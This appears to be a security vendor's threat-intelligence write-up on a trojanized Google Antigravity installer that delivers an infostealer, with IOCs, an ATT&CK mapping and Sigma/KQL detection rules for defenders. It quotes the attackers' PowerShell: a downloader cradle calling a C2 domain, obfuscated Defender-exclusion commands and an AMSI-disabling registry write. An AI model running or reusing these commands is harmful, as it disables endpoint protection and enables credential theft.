Skip to main content

Command Palette

Search for a command to run...

Trojanized Google Antigravity: When the Real Installer Is the Attacker's Best Weapon

Published
18 min read
Trojanized Google Antigravity: When the Real Installer Is the Attacker's Best Weapon

Executive Summary

On April 21, 2026, Malwarebytes documented a campaign distributing an infostealer disguised as the Google Antigravity installer — an AI coding tool launched in November 2025 that quickly became one of the most-searched developer tools on the web. Attackers didn't build a convincing fake: they took the genuine Antigravity installer, embedded one additional PowerShell script into the MSI's Custom Action table, and distributed the result via the typosquat domain google-antigravity[.]com.

What makes this campaign particularly dangerous is that victims get exactly what they asked for: Antigravity installs correctly, a desktop shortcut appears, and everything works. The malicious activity unfolds silently in the background across three structured stages — Defender disable → machine profile exfiltration → persistent backdoor staging disguised as a Microsoft Edge update task.

Stolen session cookies allow complete MFA bypass. The window between running the installer and losing account access can be measured in minutes.

Priority action: Check firewall/EDR logs immediately for connections to opus-dsn[.]com and captr.b-cdn[.]net, hunt for the scheduled task MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}, and inspect C:\ProgramData\ for MicrosoftEdgeUpdate.png.


1. Context: The AI Tool Lure Is Accelerating

From cracked software to AI tools — an evolving vector

Malware distribution through fake software downloads is not new. What has changed is the lure. Over the past two years, every time a major AI tool launches, typosquat domains and trojanized installers appear within weeks. The pattern is well documented:

  • Jan–Mar 2026: At least 20 distinct malware campaigns targeting AI and vibe coding tools (Pillar Security)

  • Feb 2026: Fake Claude Code pages distributing Amatera Stealer via Google Ads

  • Mar 2026: OpenClaw abused via ClickFix and malicious skill repositories

  • Apr 2026: Fake Slack installer (slacks[.]pro) deploying HVNC backdoor; Fake Google Antigravity deploying .NET stealer

The incentive is clear. According to Pillar Security, AI and vibe coding tool users skew heavily toward macOS and tend to hold higher-value credentials: SSH keys, cloud tokens, cryptocurrency wallets. And every high-profile AI launch creates a surge of users who want to try it immediately, before they've memorized the correct URL or had time to verify the domain.

Why Google Antigravity was a well-chosen target

Google Antigravity launched in November 2025 and became one of the most-searched developer tools on the web almost immediately. Its real URL is antigravity.google — not something a new user would have memorized. That gap between brand recognition and URL familiarity is precisely what typosquatting exploits.


2. Kill Chain / Attack Flow

[Victim] → Searches "Google Antigravity download"
     │
     ▼
[Typosquat Domain]
google-antigravity[.]com  (impersonating antigravity.google)
     │  Website interface convincingly mimics Google's real page
     ▼
[Download] → Antigravity_v1.22.2.0.exe  (138 MB)
     │  Real installer + 1 malicious entry in MSI Custom Action table
     ▼
[MSI Execution]
     │  Custom Action "wefasgsdfg" runs PowerShell cradle
     │  Antigravity installs normally into C:\Program Files (x86)\
     ▼
[Stage 1 — Downloader Cradle]  scr[random].ps1
     │  HTTPS GET → https://opus-dsn[.]com/login/
     │  Sends machine profile, awaits operator decision
     ▼
[Operator Decision: Is this target worth attacking?]
     │  NO → Stop. Victim never knows anything happened.
     │  YES → Server returns payload script
     ▼
[Stage 2 — Defender Disable + Machine Profiling]
     │  Add-MpPreference: Exclude %ProgramData%, %APPDATA%
     │  Add-MpPreference: Exclude .exe, .msi, .dll, .png
     │  Add-MpPreference: Exclude rundll32, regasm, powershell, chrome, msedge
     │  Disable AMSI: HKLM\...\AmsiEnable=0
     │  Collect: Windows version, AD domain name, installed AV product
     │  Exfil profile → C2 (inside utm_content parameter)
     ▼
[Stage 3 — Persistent Payload Staging]
     │  Download: captr.b-cdn[.]net/secret.png
     │  Save: C:\ProgramData\MicrosoftEdgeUpdate.png (AES-256-CBC)
     │  Create Scheduled Task: MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}
     │  Action: conhost.exe --headless → PowerShell → decrypt PNG → load .NET assembly
     ▼
[Stage 4 — One-Shot In-Memory Stealer]
     │  Download: captr.b-cdn[.]net/GGn.xml (AES encrypted)
     │  Decrypt → reflectively load .NET assembly into memory
     │  Collect: Logins, Cookies, Autofills, FTP credentials, Crypto wallets
     │  Exfiltrate → C2
     ▼
[Account Takeover within minutes]

3. Technical Analysis

3.1 The Trojanized Installer: One Extra Line

The most technically notable aspect of this campaign: attackers didn't build a fake installer. They took the genuine 138 MB Google Antigravity installer — including the full Electron application, Vulkan graphics libraries, and the updater — and added exactly one row to the MSI Custom Action table.

Trojanized Antigravity installer setup wizard

The Setup Wizard of the trojanized installer — visually identical to the legitimate version.

A legitimate MSI's Custom Action table contains 11 entries, all prefixed AI_ (auto-generated by the installer tool). The 12th entry, named wefasgsdfg — a keyboard mash the attacker typed when the tool prompted for a name — is the only one running malicious code.

MSI Custom Action table showing the wefasgsdfg entry

Custom Action table: 11 standard AI_ entries, plus wefasgsdfg at the bottom — the attacker's addition.

Malicious entry name: wefasgsdfg
Action:               Run PowerShell script from %TEMP%
Timing:               During install, alongside legitimate steps
Effect:               Antigravity installs correctly; payload runs silently in parallel

Result: Antigravity is installed into C:\Program Files (x86)\Google LLC\Antigravity\, a desktop shortcut appears, the app opens and works correctly. The user has no reason to suspect anything.

3.2 Downloader Cradle: Maximum Operator Flexibility

The wefasgsdfg entry drops two PowerShell files into %TEMP%:

File Contents
scr[4-digit-random].ps1 Attacker's script — the downloader cradle
pss[4-digit-random].ps1 Legitimate Advanced Installer utility — harmless

The downloader cradle (scr*.ps1) has one job: open an HTTPS connection to https://opus-dsn[.]com/login/, retrieve whatever code the server sends back, and execute it. Evasion techniques used:

# Spoof a Microsoft Referer header
$req = [System.Net.WebRequest]::Create("https://opus-dsn[.]com/login/")
$req.Referer = "https://www.microsoft.com"
 
# Route through system proxy (inherits corporate proxy auth transparently)
$req.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
 
# Save and restore parent PowerShell's TLS setting on exit

The architectural value for the attacker: the real payload lives on their server, not inside the installer. This means:

  • Payload can be swapped at any time without redistributing the installer

  • Each victim can be targeted individually — only send payload to "worthy" machines

  • If the C2 domain is blocked, rotate it; the installer in the wild remains unchanged If the server returns nothing (sandbox, uninteresting machine, or operator offline), no additional files are dropped, no persistence is created, no changes are made. Automated security tooling will find nothing to flag.

Downloader cradle network traffic

Cradle traffic: DNS query → TCP 443 → single HTTPS GET /login/ → PowerShell exits. One connection.

3.3 Stage 2: Neutralizing Defender — Three Layers of Evasion

When the server decides a target is worth attacking, the returned payload script executes three sequential steps.

Step 1 — Initial Defender exclusions:

# Cmdlet name split with backtick to bypass naive string-matching detections
Add`-MpPreference -ExclusionPath $env:ProgramData
Add`-MpPreference -ExclusionPath $env:APPDATA
Add`-MpPreference -ExclusionExtension ".exe", ".msi", ".dll"
Add`-MpPreference -ExclusionProcess "powershell.exe", "regasm.exe", "rundll32.exe", "msedge.exe", "chrome.exe"

Step 2 — Machine profile collection and exfiltration:

Profile contents:
- Windows version
- Active Directory domain (if domain-joined)
- Installed AV product
 
Transmission:
- RSA-encrypted with public key embedded in the script
- Sent inside a utm_content query parameter
  → Looks like ordinary marketing analytics traffic in any access log

Step 3 — AMSI disabled:

# Extend exclusions for stage 3 needs
Add`-MpPreference -ExclusionExtension ".png"
Add`-MpPreference -ExclusionProcess "conhost.exe"
 
# Disable AMSI system-wide
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Script\Settings" `
                 -Name "AmsiEnable" -Value 0

AMSI (Antimalware Scan Interface) is the layer that allows Windows Defender to read script content before execution — including in-memory scripts. Once disabled, any PowerShell script and .NET assembly loaded afterward runs without AV scanning.

3.4 Stage 3: Persistence — A "PNG" That Isn't a PNG

Download URL:  https://captr.b-cdn[.]net/secret.png
Saved to:      C:\ProgramData\MicrosoftEdgeUpdate.png
Real content:  AES-256-CBC ciphertext wrapping a .NET assembly
               Key/IV: PBKDF2 with 10,000 iterations from hardcoded passphrase

The scheduled task is registered as:

MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}

The legitimate Microsoft Edge update task is named MicrosoftEdgeUpdateTaskMachineCore — the attacker appended a GUID-like string to make it different enough to avoid name collision, but close enough to disappear in a task list scan.

Task action:

conhost.exe --headless → hidden PowerShell → decrypt MicrosoftEdgeUpdate.png 
→ reflectively load .NET assembly into PowerShell's own process space

Why reflective loading? The assembly never lands on disk as an executable. It's decrypted in memory and loaded directly into the PowerShell process. Only the AES-encrypted .png and the scheduled task persist on disk — and both are in paths Defender has been instructed to exclude. Forensic footprint is minimal.

3.5 Stage 4: In-Memory Stealer — Runs Once, Leaves Nothing

Alongside registering persistence, the script downloads a second payload:

URL:       https://captr.b-cdn[.]net/GGn.xml
Format:    AES-encrypted, different key from secret.png
Execution: Reflective load into running PowerShell process
Lifecycle: Runs once, in memory, gone after PowerShell exits

The .NET stealer assembly, characterized by its own class and method names:

Classes: BrowserStealer, CookieStealer, WalletStealer,
         DiscordStealer, TelegramStealer, SteamStealer, FtpStealer
Methods: GetLogins(), GetCookies(), GetAutofills(),
         GetFtpConnections(), ClipboardHijack(), KeylogInit()
.NET stealer assembly function names

Class/method names from the .NET stealer — written in plain English, describing the malware's purpose directly.

Data collected:

Data Type Source
Saved passwords Chrome, Edge, Brave, Firefox, all Chromium-based browsers
Session cookies Gmail, Microsoft 365, banking portals, GitHub, Discord, Telegram, Steam
Autofill / Credit cards Browser autofill databases
Cryptocurrency wallets Browser extensions (MetaMask, Exodus...) + desktop wallet files
FTP credentials FTP clients
Keystrokes Keystroke logger (Windows API import)
Clipboard Clipboard hijacker — critical for crypto address replacement

Hidden Desktop (HVNC) capability:

Beyond the stealer, the binary imports Windows APIs for HVNC (Hidden Virtual Network Computing): creating a second, invisible Windows desktop that the attacker can operate independently from the victim's active session. In full deployment, an attacker can log into accounts, approve transactions, or send messages — while the victim's real screen shows nothing unusual. For the duration of the infection, the attacker is effectively a second presence on the machine.


4. Why Session Cookies Are More Dangerous Than Passwords

Password theft has become a well-understood risk, and most organizations have invested in MFA and anomaly detection to mitigate it. Session cookies bypass both mechanisms entirely.

Scenario:
1. Victim has an active Gmail session (cookie still valid)
2. Stealer copies the session cookie → sends to C2
3. Attacker imports the cookie into their browser
4. Gmail sees a valid session cookie → grants inbox access, no questions asked
5. No MFA prompt. No "new device" notification. The website thinks the user is already in.

With Gmail or Microsoft 365 compromised this way, an attacker can reset nearly every linked account within minutes. Credential-based MFA provides no protection against session cookie theft — the authentication already happened before the cookie was stolen.


5. Indicators of Compromise (IOC)

⚠️ All domains and IPs are defanged. Re-fang before adding to blocklists.

File Artifacts

# Trojanized installer
SHA256: 61aca585687ec21a182342a40de3eaa12d3fc0d92577456cae0df37c3ed28e99
Name:   Antigravity_v1.22.2.0.exe
Size:   138 MB

Network Indicators

# C2 and payload hosting
opus-dsn[.]com            (downloader cradle C2)
captr.b-cdn[.]net         (BunnyCDN — payload hosting, legitimate CDN abused)
89[.]124[.]96[.]27        (IP behind opus-dsn[.]com)
 
# Distribution
google-antigravity[.]com  (typosquat distribution domain)

Host-Based Indicators

# Persistence file
C:\ProgramData\MicrosoftEdgeUpdate.png       (AES-encrypted .NET assembly)
 
# Scheduled task
Name:   MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}
Action: conhost.exe --headless [PowerShell]
Trigger: At every logon, unprivileged (no UAC prompt)
 
# Registry — AMSI disabled
HKLM\Software\Policies\Microsoft\Windows Script\Settings\AmsiEnable = 0
 
# PowerShell temp files (names regenerated each run)
%TEMP%\scr[4-random-digits].ps1
%TEMP%\pss[4-random-digits].ps1
 
# Legitimate install path (confirms trojanized installer was used)
C:\Program Files (x86)\Google LLC\Antigravity\

Defender Exclusions Added (Sign of Compromise)

# Run on suspect endpoint to check for malicious exclusions:
Get-MpPreference | Select-Object ExclusionPath, ExclusionExtension, ExclusionProcess
 
# Suspicious result if you see:
ExclusionPath:      C:\ProgramData, %APPDATA%
ExclusionExtension: .exe, .msi, .dll, .png
ExclusionProcess:   powershell.exe, rundll32.exe, regasm.exe, conhost.exe, chrome.exe, msedge.exe

6. MITRE ATT&CK Mapping

Phase Technique ID Technique Name Description
Resource Development T1583.001 Acquire Infrastructure: Domains Register typosquat domain
Initial Access T1204.002 User Execution: Malicious File User runs trojanized installer
Execution T1059.001 PowerShell Downloader cradle + payload scripts
Execution T1059.003 Windows Command Shell conhost.exe --headless
Persistence T1053.005 Scheduled Task MicrosoftEdgeUpdateTaskMachineCore{...}
Defense Evasion T1036.004 Masquerade Task or Service Fake Edge update task name
Defense Evasion T1562.001 Disable/Modify Security Tools Add-MpPreference exclusions
Defense Evasion T1562.001 Impair Defenses: Disable AMSI AmsiEnable=0 in registry
Defense Evasion T1027 Obfuscated Files or Information Backtick-split cmdlet names
Defense Evasion T1027.002 Software Packing AES-256-CBC encrypted .NET assembly
Defense Evasion T1620 Reflective Code Loading In-memory .NET assembly loading
Defense Evasion T1036.005 Match Legitimate Name or Location Fake .png, legit-looking path
C2 T1071.001 Application Layer Protocol: Web C2 over HTTPS
C2 T1568 Dynamic Resolution Operator-controlled payload delivery
C2 T1102.002 Web Service: Bidirectional Communication BunnyCDN as payload hosting
Credential Access T1555.003 Credentials from Web Browsers Browser password/cookie theft
Credential Access T1539 Steal Web Session Cookie Session cookie exfiltration
Collection T1056.001 Keylogging Keystroke logging Windows API
Collection T1115 Clipboard Data Clipboard hijacking
Collection T1005 Data from Local System Crypto wallet, FTP data

7. Detection Logic

Sigma Rule — AMSI Disabled via Registry

title: AMSI Disabled via Registry Policy Key
id: b1c2d3e4-f5a6-7890-bcde-f12345678901
status: experimental
description: Detects disabling of AMSI via registry write — common precursor to
  in-memory payload execution in infostealer and post-exploitation frameworks
references:
  - https://www.malwarebytes.com/blog/threat-intel/2026/04/fake-google-antigravity-downloads-are-stealing-accounts-in-minutes
author: Security Research Team
date: 2026/04/27
tags:
  - attack.defense_evasion
  - attack.t1562.001
logsource:
  category: registry_set
  product: windows
detection:
  selection:
    TargetObject|contains: '\Windows Script\Settings\AmsiEnable'
    Details: 'DWORD (0x00000000)'
  condition: selection
falsepositives:
  - Intentional administrative policy (rare, document and baseline)
level: high

Sigma Rule — Add-MpPreference with Backtick Obfuscation

title: Suspicious Add-MpPreference with Backtick Obfuscation
id: c2d3e4f5-a6b7-8901-cdef-234567890123
status: experimental
description: Detects PowerShell Add-MpPreference with backtick-split cmdlet name
  used to bypass string-matching AV/SIEM detections
tags:
  - attack.defense_evasion
  - attack.t1562.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'Add`-MpPreference'
  condition: selection
falsepositives:
  - Backtick in Add-MpPreference is never present in legitimate administrative scripts
level: high

Sigma Rule — Fake Edge Update Scheduled Task

title: Suspicious Scheduled Task Mimicking Microsoft Edge Updater
id: d3e4f5a6-b7c8-9012-def0-345678901234
status: experimental
description: Detects creation of scheduled task with name appending GUID-like string
  to the legitimate Microsoft Edge update task name
tags:
  - attack.persistence
  - attack.t1053.005
  - attack.t1036.004
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\schtasks.exe'
    CommandLine|contains|all:
      - 'MicrosoftEdgeUpdateTaskMachineCore'
      - '{'
  condition: selection
falsepositives:
  - The legitimate Edge task does NOT include a GUID suffix
level: high

KQL (Microsoft Sentinel) — Downloader Cradle C2 Contact

// Detect PowerShell contacting known campaign C2 infrastructure
let KnownC2 = dynamic(["opus-dsn.com", "captr.b-cdn.net"]);
DeviceNetworkEvents
| where RemoteUrl has_any (KnownC2)
    or RemoteIP == "89.124.96.27"
| where InitiatingProcessFileName =~ "powershell.exe"
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP,
          InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc

KQL — Suspicious PNG in ProgramData Created by PowerShell

// Detect encrypted payload staging as .png file
DeviceFileEvents
| where FolderPath startswith @"C:\ProgramData\"
| where FileName endswith ".png"
| where InitiatingProcessFileName =~ "powershell.exe"
| project TimeGenerated, DeviceName, FileName, FolderPath,
          InitiatingProcessFileName, InitiatingProcessCommandLine

KQL — AMSI Registry Key Modified

DeviceRegistryEvents
| where RegistryKey has "Windows Script\\Settings"
| where RegistryValueName == "AmsiEnable"
| where RegistryValueData == "0"
| project TimeGenerated, DeviceName, RegistryKey,
          RegistryValueName, RegistryValueData,
          InitiatingProcessFileName, InitiatingProcessCommandLine

KQL — Defender Exclusion Modified Outside of GPO

// Alert on any Add-MpPreference that changes exclusion paths, extensions, or processes
DeviceProcessEvents
| where ProcessCommandLine has "Add-MpPreference"
    or ProcessCommandLine has "Add`-MpPreference"
| where ProcessCommandLine has_any ("ExclusionPath", "ExclusionExtension", "ExclusionProcess")
| project TimeGenerated, DeviceName, AccountName,
          ProcessCommandLine, InitiatingProcessFileName
| order by TimeGenerated desc

8. Expert Analysis

Why This Campaign Is More Disciplined Than It Looks

Two aspects of this operation stand out as indicators of operational maturity.

First, operator-controlled selective targeting. The downloader cradle doesn't automatically deploy the payload — it checks in with the C2 and waits for a decision. This means the attacker can skip sandboxes and VMs, and selectively attack only machines that match a desired profile. Victims the operator chooses not to escalate never know they were checked. This is not a spray-and-pray campaign; it's targeted deployment with manual approval gates.

Second, layered defense evasion with minimal artifact footprint. Backtick obfuscation in PowerShell to bypass string-matching detection, AES-encrypted payload disguised as a PNG in a Microsoft-adjacent directory, AMSI disabled before in-memory assembly loading, and UTM-parameter-disguised C2 exfiltration — each step removes one detection layer. The result is a payload that runs in an environment where Defender has been surgically blinded to its specific activity patterns.

The Broader Pattern: AI Tool Lure as a Systematic Playbook

Credentials harvested by infostealer malware have been linked to major breaches at organizations including Snowflake, Ticketmaster, and Santander Bank — in each case, attackers used stolen employee credentials to access cloud environments and exfiltrate customer data.

The pattern forming now is clear: every major AI tool launch = typosquat domain + trojanized installer within weeks. Fake Claude Code, fake OpenClaw, fake Slack, and now fake Google Antigravity — this is not a series of isolated incidents. It's a playbook being systematically reused by multiple threat actors who have recognized that the window between a tool's launch and users memorizing the correct download URL is an exploitable attack surface.

For enterprise defenders, the machine profile collection step adds a dimension beyond individual account compromise. The profile includes the Active Directory domain name. A single trojanized install on an employee's work laptop tells the operator exactly which organization's network this victim belongs to — which can make this incident the starting point for a targeted corporate intrusion, not just a personal credential theft.


9. Recommendations

Immediate (0–24 hours)

1. Hunt in EDR/SIEM:
   - Scheduled task: MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}
   - File: C:\ProgramData\MicrosoftEdgeUpdate.png
   - Registry: HKLM\Software\Policies\Microsoft\Windows Script\Settings\AmsiEnable = 0
   - Hash: 61aca585687ec21a182342a40de3eaa12d3fc0d92577456cae0df37c3ed28e99
 
2. Block at firewall/proxy:
   - opus-dsn[.]com (all ports)
   - 89[.]124[.]96[.]27
   - google-antigravity[.]com
 
3. Check for abnormal Defender exclusions on endpoints:
   Get-MpPreference | Select ExclusionPath, ExclusionExtension, ExclusionProcess

If Evidence of Compromise Is Confirmed

4. From a clean, separate device:
   - Sign out of all active sessions: Google, Microsoft 365, banking, GitHub,
     Discord, Telegram, Steam, crypto exchanges
   - Change passwords starting with email accounts
     (compromised email = attacker can reset everything else)
   - Rotate all API keys, SSH keys, and cloud credentials on the affected machine
   - Move cryptocurrency funds immediately from a clean device
   - Wipe and reinstall Windows — do not attempt to clean and trust this machine
 
5. If the affected machine is a work laptop:
   - Notify IT/security team immediately
   - The machine profile already sent the Active Directory domain to the attacker
   - This is no longer just a personal incident — treat it as a potential corporate intrusion

Short-Term (1–7 days)

6. Deploy detection rules from Section 7
 
7. Block or alert on outbound PowerShell → external HTTPS during business hours
 
8. Internal communication to developer teams:
   Bookmark official URLs for tools you use; never download via search result
   without verifying the domain exactly

Long-Term

9. Application control (AppLocker/WDAC):
   Block executables without valid digital signatures from trusted vendors
 
10. Monitor Defender exclusion changes (Event ID 5007):
    Any Add-MpPreference change outside of GPO should trigger an alert
 
11. Script Block Logging + PowerShell Constrained Language Mode
    Makes downloader cradles significantly harder to execute
 
12. Evaluate whether CDN domains (b-cdn.net, etc.) need monitoring or category-based
    blocking — this campaign abused BunnyCDN for payload delivery

10. References

  1. Stefan Dasic, Malwarebytes — Fake Google Antigravity downloads are stealing accounts in minutes, 2026-04-21
    https://www.malwarebytes.com/blog/threat-intel/2026/04/fake-google-antigravity-downloads-are-stealing-accounts-in-minutes

  2. Malwarebytes — A fake Slack download is giving attackers a hidden desktop on your machine, 2026-04-16
    https://www.malwarebytes.com/blog/threat-intel/2026/04/a-fake-slack-download-is-giving-attackers-a-hidden-desktop-on-your-machine

  3. The Hacker News — ClickFix Campaigns Spread MacSync macOS Infostealer via Fake AI Tool Installers, March 2026
    https://thehackernews.com/2026/03/clickfix-campaigns-spread-macsync-macos.html

  4. Intel 471 — OpenClaw: A viral AI assistant and a magnet for infostealer malware, March 2026
    https://www.intel471.com/blog/openclaw-a-viral-ai-assistant-and-a-magnet-for-infostealer-malware-and-clickfix-trickery

  5. MITRE ATT&CK — T1620: Reflective Code Loading
    https://attack.mitre.org/techniques/T1620/

  6. MITRE ATT&CK — T1562.001: Disable or Modify Tools
    https://attack.mitre.org/techniques/T1562/001/

  7. Microsoft Learn — How AMSI helps you defend against malware
    https://learn.microsoft.com/en-us/windows/win32/amsi/

  8. Pen Test Partners — 2025, the year of the Infostealer, February 2026
    https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/

More from this blog

F

FPT IS Security

761 posts

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.